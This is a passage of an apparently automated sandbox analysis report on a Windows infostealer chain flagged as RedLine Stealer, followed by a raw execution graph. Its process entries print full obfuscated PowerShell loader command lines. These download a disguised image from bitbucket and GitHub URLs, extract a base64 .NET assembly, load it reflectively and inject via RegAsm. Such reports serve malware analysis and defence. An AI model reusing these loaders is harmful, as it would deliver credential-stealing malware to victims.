6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#
c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#DU#MgBs#Gk#dw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#D##Jw#p#Ck#fQB9##==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:06:16:09
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:06:16:17
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:06:16:30
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                    Imagebase:0xcc0000
                                                                    File size:65'440 bytes
                                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.2070112434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true


                                                                      Execution Graph

                                                                      Execution Coverage:31.4%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:42%
                                                                      Total number of Nodes:929
                                                                      Total number of Limit Nodes:44
7ff7d6fd3116 2159->2160 2161 7ff7d6fd3141 2159->2161 2162 7ff7d6fd3134 2160->2162 2436 7ff7d6fd60a4 2160->2436 2456 7ff7d6fd5fe4 2161->2456 2614 7ff7d6fd3f74 2162->2614 2171 7ff7d6fd8470 7 API calls 2172 7ff7d6fd2ce1 2171->2172 2205 7ff7d6fd61ec 2172->2205 2173 7ff7d6fd315b GetSystemDirectoryA 2174 7ff7d6fd7ba8 CharPrevA 2173->2174 2175 7ff7d6fd3186 LoadLibraryA 2174->2175 2176 7ff7d6fd319f GetProcAddress 2175->2176 2177 7ff7d6fd31c9 FreeLibrary 2175->2177 2176->2177 2178 7ff7d6fd31ba DecryptFileA 2176->2178 2179 7ff7d6fd3273 SetCurrentDirectoryA 2177->2179 2180 7ff7d6fd31e4 2177->2180 2178->2177 2181 7ff7d6fd3291 2179->2181 2182 7ff7d6fd320d 2179->2182 2180->2179 2183 7ff7d6fd31f0 GetWindowsDirectoryA 2180->2183 2191 7ff7d6fd32fb 2181->2191 2194 7ff7d6fd32cb 2181->2194 2204 7ff7d6fd331f 2181->2204 2186 7ff7d6fd4dcc 24 API calls 2182->2186 2183->2182 2184 7ff7d6fd325a 2183->2184 2519 7ff7d6fd6ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2184->2519 2188 7ff7d6fd322b 2186->2188 2633 7ff7d6fd7700 GetLastError 2188->2633 2189 7ff7d6fd3347 2193 7ff7d6fd3368 2189->2193 2568 7ff7d6fd40c4 2189->2568 2190 7ff7d6fd2318 18 API calls 2190->2189 2546 7ff7d6fd5d90 2191->2546 2199 7ff7d6fd3383 2193->2199 2202 7ff7d6fd3236 2193->2202 2200 7ff7d6fd7ac8 28 API calls 2194->2200 2195 7ff7d6fd3230 2195->2202 2197 7ff7d6fd32f6 2197->2202 2634 7ff7d6fd772c 2197->2634 2644 7ff7d6fd494c 2199->2644 2200->2197 2202->2171 2204->2189 2204->2190 2204->2202 2206 7ff7d6fd6214 2205->2206 2207 7ff7d6fd624c LocalFree LocalFree 2206->2207 2209 7ff7d6fd6229 SetFileAttributesA DeleteFileA 2206->2209 2216 7ff7d6fd6273 2206->2216 2207->2206 2208 7ff7d6fd6311 2210 7ff7d6fd6387 2208->2210 2212 7ff7d6fd632d RegOpenKeyExA 2208->2212 2209->2207 2211 7ff7d6fd8470 7 API calls 2210->2211 2213 7ff7d6fd2ce8 2211->2213 2212->2210 2214 7ff7d6fd635e RegDeleteValueA RegCloseKey 2212->2214 2213->2097 2213->2104 2219 7ff7d6fd2318 2213->2219 2214->2210 2215 7ff7d6fd62f4 SetCurrentDirectoryA 2218 7ff7d6fd204c 16 API 
calls 2215->2218 2216->2208 2216->2215 2217 7ff7d6fd7c40 4 API calls 2216->2217 2217->2215 2218->2208 2220 7ff7d6fd2330 2219->2220 2221 7ff7d6fd2447 2219->2221 2223 7ff7d6fd23cb RegOpenKeyExA 2220->2223 2224 7ff7d6fd233a 2220->2224 2893 7ff7d6fd2244 GetWindowsDirectoryA 2221->2893 2225 7ff7d6fd23c3 2223->2225 2226 7ff7d6fd23fe RegQueryInfoKeyA 2223->2226 2224->2225 2227 7ff7d6fd234a RegOpenKeyExA 2224->2227 2225->2104 2228 7ff7d6fd23a8 RegCloseKey 2226->2228 2227->2225 2229 7ff7d6fd237d RegQueryValueExA 2227->2229 2228->2225 2229->2228 2231 7ff7d6fd5024 2230->2231 2232 7ff7d6fd4e49 LoadStringA 2230->2232 2235 7ff7d6fd8470 7 API calls 2231->2235 2233 7ff7d6fd4e73 2232->2233 2234 7ff7d6fd4eb5 2232->2234 2238 7ff7d6fd7f04 13 API calls 2233->2238 2236 7ff7d6fd4f31 2234->2236 2241 7ff7d6fd4ec1 LocalAlloc 2234->2241 2237 7ff7d6fd2d59 2235->2237 2243 7ff7d6fd4f44 LocalAlloc 2236->2243 2244 7ff7d6fd4f8e LocalAlloc 2236->2244 2237->2097 2237->2106 2239 7ff7d6fd4e78 2238->2239 2240 7ff7d6fd4e81 MessageBoxA 2239->2240 2242 7ff7d6fd7e34 2 API calls 2239->2242 2240->2231 2241->2231 2249 7ff7d6fd4f14 2241->2249 2242->2240 2243->2231 2250 7ff7d6fd4f79 2243->2250 2244->2231 2254 7ff7d6fd4f2c 2244->2254 2248 7ff7d6fd4fbc MessageBeep 2252 7ff7d6fd7f04 13 API calls 2248->2252 2253 7ff7d6fd114c _vsnprintf 2249->2253 2251 7ff7d6fd114c _vsnprintf 2250->2251 2251->2254 2255 7ff7d6fd4fd3 2252->2255 2253->2254 2254->2248 2256 7ff7d6fd4fdc MessageBoxA LocalFree 2255->2256 2257 7ff7d6fd7e34 2 API calls 2255->2257 2256->2231 2257->2256 2260 7ff7d6fd1c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2259->2260 2263 7ff7d6fd1c4c 2259->2263 2261 7ff7d6fd1cec ExitWindowsEx 2260->2261 2260->2263 2261->2263 2264 7ff7d6fd1c68 2261->2264 2262 7ff7d6fd4dcc 24 API calls 2262->2264 2263->2262 2265 7ff7d6fd8470 7 API calls 2264->2265 2266 7ff7d6fd1d1a 2265->2266 2266->2097 2268 7ff7d6fd509b 2267->2268 2269 7ff7d6fd2e43 2267->2269 2268->2269 2270 7ff7d6fd50a4 FindResourceA LoadResource 
LockResource 2268->2270 2269->2118 2269->2134 2270->2269 2271 7ff7d6fd50e3 memcpy_s FreeResource 2270->2271 2271->2269 2282 7ff7d6fd7566 2272->2282 2297 7ff7d6fd70f2 2272->2297 2273 7ff7d6fd8470 7 API calls 2274 7ff7d6fd2fb1 2273->2274 2274->2133 2274->2134 2275 7ff7d6fd711d CharNextA 2275->2297 2276 7ff7d6fd71e7 GetModuleFileNameA 2277 7ff7d6fd720f 2276->2277 2278 7ff7d6fd721c 2276->2278 2364 7ff7d6fd7d68 2277->2364 2278->2282 2280 7ff7d6fd76f1 2373 7ff7d6fd8648 RtlCaptureContext RtlLookupFunctionEntry 2280->2373 2282->2273 2283 7ff7d6fd71ca 2283->2276 2283->2282 2285 7ff7d6fd7238 CharUpperA 2286 7ff7d6fd766f 2285->2286 2285->2297 2287 7ff7d6fd4dcc 24 API calls 2286->2287 2288 7ff7d6fd7692 2287->2288 2289 7ff7d6fd769e CloseHandle 2288->2289 2290 7ff7d6fd76aa ExitProcess 2288->2290 2289->2290 2291 7ff7d6fd739d CharUpperA 2291->2297 2292 7ff7d6fd7ce8 IsDBCSLeadByte CharNextA 2292->2297 2293 7ff7d6fd7346 CompareStringA 2293->2297 2294 7ff7d6fd73fb CharUpperA 2294->2297 2295 7ff7d6fd7492 CharUpperA 2295->2297 2296 7ff7d6fd72d0 CharUpperA 2296->2297 2297->2275 2297->2280 2297->2282 2297->2283 2297->2285 2297->2291 2297->2292 2297->2293 2297->2294 2297->2295 2297->2296 2369 7ff7d6fd7ba8 2297->2369 2301 7ff7d6fd8479 2299->2301 2300 7ff7d6fd2cd4 2300->2097 2300->2159 2301->2300 2302 7ff7d6fd84d0 RtlCaptureContext RtlLookupFunctionEntry 2301->2302 2303 7ff7d6fd8515 RtlVirtualUnwind 2302->2303 2304 7ff7d6fd8557 2302->2304 2303->2304 2379 7ff7d6fd8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2304->2379 2308 7ff7d6fd2213 2307->2308 2311 7ff7d6fd2086 2307->2311 2309 7ff7d6fd8470 7 API calls 2308->2309 2310 7ff7d6fd2222 2309->2310 2310->2148 2312 7ff7d6fd20dc FindFirstFileA 2311->2312 2312->2308 2313 7ff7d6fd20fe 2312->2313 2314 7ff7d6fd21a3 2313->2314 2315 7ff7d6fd2138 lstrcmpA 2313->2315 2317 7ff7d6fd21d9 FindNextFileA 2313->2317 2320 7ff7d6fd7ba8 CharPrevA 2313->2320 2321 7ff7d6fd204c 8 API calls 2313->2321 2318 7ff7d6fd21b4 
SetFileAttributesA DeleteFileA 2314->2318 2316 7ff7d6fd2158 lstrcmpA 2315->2316 2315->2317 2316->2313 2316->2317 2317->2313 2319 7ff7d6fd21f5 FindClose RemoveDirectoryA 2317->2319 2318->2317 2319->2308 2320->2313 2321->2313 2327 7ff7d6fd3c59 2322->2327 2330 7ff7d6fd3c4f 2322->2330 2323 7ff7d6fd4dcc 24 API calls 2324 7ff7d6fd3f05 2323->2324 2325 7ff7d6fd8470 7 API calls 2324->2325 2326 7ff7d6fd3042 2325->2326 2326->2148 2337 7ff7d6fd12ec 2326->2337 2327->2324 2329 7ff7d6fd3db1 2327->2329 2327->2330 2380 7ff7d6fd2834 2327->2380 2329->2324 2329->2330 2331 7ff7d6fd3eb7 MessageBeep 2329->2331 2330->2323 2330->2324 2393 7ff7d6fd7f04 2331->2393 2334 7ff7d6fd3ed3 MessageBoxA 2334->2324 2338 7ff7d6fd133c 2337->2338 2343 7ff7d6fd14b5 2337->2343 2427 7ff7d6fd11cc LoadLibraryA 2338->2427 2340 7ff7d6fd8470 7 API calls 2342 7ff7d6fd14da 2340->2342 2342->2148 2356 7ff7d6fd7ac8 FindResourceA 2342->2356 2343->2340 2344 7ff7d6fd134d GetCurrentProcess OpenProcessToken 2344->2343 2345 7ff7d6fd1377 GetTokenInformation 2344->2345 2346 7ff7d6fd14a0 CloseHandle 2345->2346 2347 7ff7d6fd13a0 GetLastError 2345->2347 2346->2343 2347->2346 2348 7ff7d6fd13b5 LocalAlloc 2347->2348 2348->2346 2349 7ff7d6fd13d2 GetTokenInformation 2348->2349 2350 7ff7d6fd1491 LocalFree 2349->2350 2351 7ff7d6fd13fc AllocateAndInitializeSid 2349->2351 2350->2346 2351->2350 2354 7ff7d6fd1445 2351->2354 2352 7ff7d6fd1481 FreeSid 2352->2350 2353 7ff7d6fd1452 EqualSid 2353->2354 2355 7ff7d6fd1476 2353->2355 2354->2352 2354->2353 2354->2355 2355->2352 2357 7ff7d6fd7b63 2356->2357 2358 7ff7d6fd7b03 LoadResource 2356->2358 2360 7ff7d6fd4dcc 24 API calls 2357->2360 2358->2357 2359 7ff7d6fd7b1d DialogBoxIndirectParamA FreeResource 2358->2359 2359->2357 2363 7ff7d6fd7b87 2359->2363 2361 7ff7d6fd7b82 2360->2361 2361->2363 2363->2158 2365 7ff7d6fd7dd9 2364->2365 2367 7ff7d6fd7d88 2364->2367 2365->2278 2366 7ff7d6fd7d90 IsDBCSLeadByte 2366->2367 2367->2366 2368 7ff7d6fd7db6 CharNextA 2367->2368 2368->2365 2368->2367 2370 
7ff7d6fd7bc8 2369->2370 2370->2370 2371 7ff7d6fd7bda 2370->2371 2372 7ff7d6fd7bec CharPrevA 2370->2372 2371->2297 2372->2371 2374 7ff7d6fd8685 RtlVirtualUnwind 2373->2374 2375 7ff7d6fd86c7 2373->2375 2374->2375 2378 7ff7d6fd8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2375->2378 2381 7ff7d6fd2a2f 2380->2381 2390 7ff7d6fd2872 2380->2390 2382 7ff7d6fd2a50 2381->2382 2383 7ff7d6fd2a41 GlobalFree 2381->2383 2382->2329 2383->2382 2385 7ff7d6fd28a5 GetFileVersionInfoSizeA 2386 7ff7d6fd28c2 GlobalAlloc 2385->2386 2385->2390 2386->2381 2387 7ff7d6fd28e1 GlobalLock 2386->2387 2387->2381 2388 7ff7d6fd28fc GetFileVersionInfoA 2387->2388 2389 7ff7d6fd2920 VerQueryValueA 2388->2389 2388->2390 2389->2390 2391 7ff7d6fd29ed GlobalUnlock 2389->2391 2390->2381 2390->2385 2390->2391 2392 7ff7d6fd29d9 GlobalUnlock 2390->2392 2408 7ff7d6fd261c 2390->2408 2391->2390 2392->2381 2394 7ff7d6fd7f44 GetVersionExA 2393->2394 2395 7ff7d6fd8076 2393->2395 2394->2395 2396 7ff7d6fd7f6d 2394->2396 2397 7ff7d6fd8470 7 API calls 2395->2397 2396->2395 2399 7ff7d6fd7f90 GetSystemMetrics 2396->2399 2398 7ff7d6fd3eca 2397->2398 2398->2334 2404 7ff7d6fd7e34 2398->2404 2399->2395 2400 7ff7d6fd7fa7 RegOpenKeyExA 2399->2400 2400->2395 2401 7ff7d6fd7fdc RegQueryValueExA RegCloseKey 2400->2401 2401->2395 2403 7ff7d6fd8026 2401->2403 2402 7ff7d6fd8065 CharNextA 2402->2403 2403->2395 2403->2402 2405 7ff7d6fd7edd 2404->2405 2406 7ff7d6fd7e5a EnumResourceLanguagesA 2404->2406 2405->2334 2406->2405 2407 7ff7d6fd7e9f EnumResourceLanguagesA 2406->2407 2407->2405 2409 7ff7d6fd27e0 GetSystemDirectoryA 2408->2409 2410 7ff7d6fd265b CharUpperA CharNextA CharNextA 2408->2410 2413 7ff7d6fd27f1 2409->2413 2411 7ff7d6fd269c 2410->2411 2412 7ff7d6fd27dd 2410->2412 2414 7ff7d6fd26a6 2411->2414 2415 7ff7d6fd27c7 GetWindowsDirectoryA 2411->2415 2412->2409 2416 7ff7d6fd2805 2413->2416 2417 7ff7d6fd7ba8 CharPrevA 2413->2417 2420 7ff7d6fd7ba8 CharPrevA 2414->2420 2415->2413 2418 
7ff7d6fd8470 7 API calls 2416->2418 2417->2416 2419 7ff7d6fd2814 2418->2419 2419->2390 2421 7ff7d6fd2705 RegOpenKeyExA 2420->2421 2421->2413 2422 7ff7d6fd2738 RegQueryValueExA 2421->2422 2423 7ff7d6fd27b4 RegCloseKey 2422->2423 2424 7ff7d6fd276b 2422->2424 2423->2413 2425 7ff7d6fd2774 ExpandEnvironmentStringsA 2424->2425 2426 7ff7d6fd2792 2424->2426 2425->2426 2426->2423 2428 7ff7d6fd1221 GetProcAddress 2427->2428 2429 7ff7d6fd12bb 2427->2429 2430 7ff7d6fd123f AllocateAndInitializeSid 2428->2430 2431 7ff7d6fd12ac FreeLibrary 2428->2431 2432 7ff7d6fd8470 7 API calls 2429->2432 2430->2431 2433 7ff7d6fd1288 FreeSid 2430->2433 2431->2429 2434 7ff7d6fd12ca 2432->2434 2433->2431 2434->2343 2434->2344 2437 7ff7d6fd5050 7 API calls 2436->2437 2438 7ff7d6fd60bf LocalAlloc 2437->2438 2439 7ff7d6fd610b 2438->2439 2440 7ff7d6fd60dd 2438->2440 2442 7ff7d6fd5050 7 API calls 2439->2442 2441 7ff7d6fd4dcc 24 API calls 2440->2441 2443 7ff7d6fd60fb 2441->2443 2444 7ff7d6fd611d 2442->2444 2657 7ff7d6fd7700 GetLastError 2443->2657 2446 7ff7d6fd6121 2444->2446 2447 7ff7d6fd615a lstrcmpA 2444->2447 2448 7ff7d6fd4dcc 24 API calls 2446->2448 2449 7ff7d6fd6174 LocalFree 2447->2449 2450 7ff7d6fd618a 2447->2450 2453 7ff7d6fd613f LocalFree 2448->2453 2452 7ff7d6fd3123 2449->2452 2451 7ff7d6fd4dcc 24 API calls 2450->2451 2454 7ff7d6fd61ac LocalFree 2451->2454 2452->2161 2452->2162 2452->2202 2453->2452 2455 7ff7d6fd6100 2454->2455 2455->2452 2457 7ff7d6fd5050 7 API calls 2456->2457 2458 7ff7d6fd6001 2457->2458 2459 7ff7d6fd6006 2458->2459 2460 7ff7d6fd604a 2458->2460 2461 7ff7d6fd4dcc 24 API calls 2459->2461 2462 7ff7d6fd5050 7 API calls 2460->2462 2463 7ff7d6fd6025 2461->2463 2464 7ff7d6fd6063 2462->2464 2465 7ff7d6fd3146 2463->2465 2466 7ff7d6fd772c 13 API calls 2464->2466 2465->2202 2470 7ff7d6fd66c4 2465->2470 2467 7ff7d6fd606f 2466->2467 2467->2465 2468 7ff7d6fd6073 2467->2468 2469 7ff7d6fd4dcc 24 API calls 2468->2469 2469->2463 2471 7ff7d6fd5050 7 API calls 2470->2471 2472 7ff7d6fd6706 
LocalAlloc 2471->2472 2473 7ff7d6fd6756 2472->2473 2474 7ff7d6fd6726 2472->2474 2475 7ff7d6fd5050 7 API calls 2473->2475 2476 7ff7d6fd4dcc 24 API calls 2474->2476 2477 7ff7d6fd6768 2475->2477 2478 7ff7d6fd6744 2476->2478 2479 7ff7d6fd67a5 lstrcmpA LocalFree 2477->2479 2480 7ff7d6fd676c 2477->2480 2682 7ff7d6fd7700 GetLastError 2478->2682 2483 7ff7d6fd67ec 2479->2483 2484 7ff7d6fd6837 2479->2484 2482 7ff7d6fd4dcc 24 API calls 2480->2482 2488 7ff7d6fd678a LocalFree 2482->2488 2493 7ff7d6fd64e4 53 API calls 2483->2493 2487 7ff7d6fd6b14 2484->2487 2490 7ff7d6fd684f GetTempPathA 2484->2490 2485 7ff7d6fd6749 2486 7ff7d6fd674f 2485->2486 2491 7ff7d6fd8470 7 API calls 2486->2491 2489 7ff7d6fd7ac8 28 API calls 2487->2489 2488->2486 2489->2486 2492 7ff7d6fd6872 2490->2492 2499 7ff7d6fd68a5 2490->2499 2494 7ff7d6fd3153 2491->2494 2658 7ff7d6fd64e4 2492->2658 2496 7ff7d6fd680c 2493->2496 2494->2173 2494->2202 2496->2486 2498 7ff7d6fd6814 2496->2498 2500 7ff7d6fd4dcc 24 API calls 2498->2500 2499->2486 2501 7ff7d6fd6adb GetWindowsDirectoryA 2499->2501 2502 7ff7d6fd68f9 GetDriveTypeA 2499->2502 2500->2485 2506 7ff7d6fd6ca4 38 API calls 2501->2506 2504 7ff7d6fd6916 GetFileAttributesA 2502->2504 2517 7ff7d6fd6911 2502->2517 2504->2517 2506->2499 2507 7ff7d6fd64e4 53 API calls 2507->2499 2508 7ff7d6fd6ca4 38 API calls 2508->2517 2509 7ff7d6fd6955 GetDiskFreeSpaceA 2511 7ff7d6fd6983 MulDiv 2509->2511 2509->2517 2510 7ff7d6fd2468 25 API calls 2510->2517 2511->2517 2512 7ff7d6fd6a02 GetWindowsDirectoryA 2512->2517 2513 7ff7d6fd7ba8 CharPrevA 2514 7ff7d6fd6a2a GetFileAttributesA 2513->2514 2515 7ff7d6fd6a40 CreateDirectoryA 2514->2515 2514->2517 2515->2517 2516 7ff7d6fd6a6d SetFileAttributesA 2516->2517 2517->2486 2517->2501 2517->2502 2517->2504 2517->2508 2517->2509 2517->2510 2517->2512 2517->2513 2517->2516 2518 7ff7d6fd64e4 53 API calls 2517->2518 2518->2517 2520 7ff7d6fd6d3f GetDiskFreeSpaceA 2519->2520 2521 7ff7d6fd6d12 2519->2521 2523 7ff7d6fd6f63 memset 2520->2523 2524 
7ff7d6fd6d80 MulDiv 2520->2524 2522 7ff7d6fd4dcc 24 API calls 2521->2522 2525 7ff7d6fd6d2f 2522->2525 2736 7ff7d6fd7700 GetLastError 2523->2736 2524->2523 2527 7ff7d6fd6dae GetVolumeInformationA 2524->2527 2717 7ff7d6fd7700 GetLastError 2525->2717 2530 7ff7d6fd6e45 SetCurrentDirectoryA 2527->2530 2531 7ff7d6fd6de6 memset 2527->2531 2529 7ff7d6fd6f7b GetLastError FormatMessageA 2533 7ff7d6fd6fbd 2529->2533 2539 7ff7d6fd6e6c 2530->2539 2718 7ff7d6fd7700 GetLastError 2531->2718 2532 7ff7d6fd6d34 2535 7ff7d6fd6f41 2532->2535 2536 7ff7d6fd4dcc 24 API calls 2533->2536 2540 7ff7d6fd8470 7 API calls 2535->2540 2538 7ff7d6fd6fd8 SetCurrentDirectoryA 2536->2538 2537 7ff7d6fd6dfe GetLastError FormatMessageA 2537->2533 2538->2535 2541 7ff7d6fd6eb4 2539->2541 2544 7ff7d6fd6ed8 2539->2544 2542 7ff7d6fd326f 2540->2542 2543 7ff7d6fd4dcc 24 API calls 2541->2543 2542->2179 2542->2202 2543->2532 2544->2535 2719 7ff7d6fd24f8 2544->2719 2547 7ff7d6fd5050 7 API calls 2546->2547 2548 7ff7d6fd5dab FindResourceA LoadResource LockResource 2547->2548 2549 7ff7d6fd5dfc 2548->2549 2565 7ff7d6fd5fcf 2548->2565 2550 7ff7d6fd5e56 2549->2550 2551 7ff7d6fd5e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2549->2551 2737 7ff7d6fd5c60 #20 2550->2737 2551->2550 2554 7ff7d6fd5e69 #20 2555 7ff7d6fd5ed1 #22 2554->2555 2556 7ff7d6fd5e5f 2554->2556 2557 7ff7d6fd5f55 2555->2557 2558 7ff7d6fd5f15 #23 2555->2558 2559 7ff7d6fd4dcc 24 API calls 2556->2559 2561 7ff7d6fd5f75 2557->2561 2562 7ff7d6fd5f61 FreeResource 2557->2562 2558->2556 2558->2557 2560 7ff7d6fd5f53 2559->2560 2560->2557 2563 7ff7d6fd5f9f 2561->2563 2564 7ff7d6fd5f81 2561->2564 2562->2561 2563->2565 2567 7ff7d6fd5fb1 SendMessageA 2563->2567 2566 7ff7d6fd4dcc 24 API calls 2564->2566 2565->2197 2566->2563 2567->2565 2569 7ff7d6fd4118 2568->2569 2597 7ff7d6fd412f 2568->2597 2570 7ff7d6fd5050 7 API calls 2569->2570 2570->2597 2571 7ff7d6fd4145 memset 2571->2597 2572 7ff7d6fd4254 2573 7ff7d6fd4dcc 24 API calls 2572->2573 2610 7ff7d6fd4273 2573->2610 
2575 7ff7d6fd44ee 2577 7ff7d6fd8470 7 API calls 2575->2577 2576 7ff7d6fd5050 7 API calls 2576->2597 2578 7ff7d6fd44ff 2577->2578 2578->2193 2579 7ff7d6fd42f5 CompareStringA 2580 7ff7d6fd45d8 2579->2580 2579->2597 2580->2575 2582 7ff7d6fd45f2 RegOpenKeyExA 2580->2582 2581 7ff7d6fd44df LocalFree 2581->2575 2582->2575 2586 7ff7d6fd4627 RegQueryValueExA 2582->2586 2583 7ff7d6fd4599 2585 7ff7d6fd4dcc 24 API calls 2583->2585 2587 7ff7d6fd45b8 LocalFree 2585->2587 2589 7ff7d6fd471c RegCloseKey 2586->2589 2590 7ff7d6fd466c memset GetSystemDirectoryA 2586->2590 2587->2575 2589->2575 2593 7ff7d6fd46b3 2590->2593 2594 7ff7d6fd469d 2590->2594 2592 7ff7d6fd44ad LocalFree 2592->2580 2592->2597 2596 7ff7d6fd114c _vsnprintf 2593->2596 2598 7ff7d6fd7ba8 CharPrevA 2594->2598 2595 7ff7d6fd41fd CompareStringA 2595->2597 2601 7ff7d6fd46dc RegSetValueExA 2596->2601 2597->2571 2597->2572 2597->2575 2597->2576 2597->2579 2597->2580 2597->2581 2597->2583 2597->2592 2597->2595 2611 7ff7d6fd4394 2597->2611 2764 7ff7d6fd1684 2597->2764 2803 7ff7d6fd1d28 memset memset RegCreateKeyExA 2597->2803 2830 7ff7d6fd473c CreateProcessA 2597->2830 2598->2593 2599 7ff7d6fd4574 2603 7ff7d6fd4dcc 24 API calls 2599->2603 2600 7ff7d6fd43a5 GetProcAddress 2602 7ff7d6fd4521 2600->2602 2600->2611 2601->2589 2606 7ff7d6fd4dcc 24 API calls 2602->2606 2605 7ff7d6fd4597 2603->2605 2607 7ff7d6fd4553 LocalFree 2605->2607 2608 7ff7d6fd4544 FreeLibrary 2606->2608 2855 7ff7d6fd7700 GetLastError 2607->2855 2608->2607 2610->2575 2611->2599 2611->2600 2612 7ff7d6fd44d3 FreeLibrary 2611->2612 2613 7ff7d6fd4480 FreeLibrary 2611->2613 2845 7ff7d6fd79f0 2611->2845 2612->2581 2613->2592 2615 7ff7d6fd5050 7 API calls 2614->2615 2616 7ff7d6fd3f8b LocalAlloc 2615->2616 2617 7ff7d6fd3fdd 2616->2617 2618 7ff7d6fd3fad 2616->2618 2619 7ff7d6fd5050 7 API calls 2617->2619 2620 7ff7d6fd4dcc 24 API calls 2618->2620 2621 7ff7d6fd3fef 2619->2621 2622 7ff7d6fd3fcb 2620->2622 2624 7ff7d6fd3ff3 2621->2624 2625 7ff7d6fd4030 lstrcmpA 2621->2625 
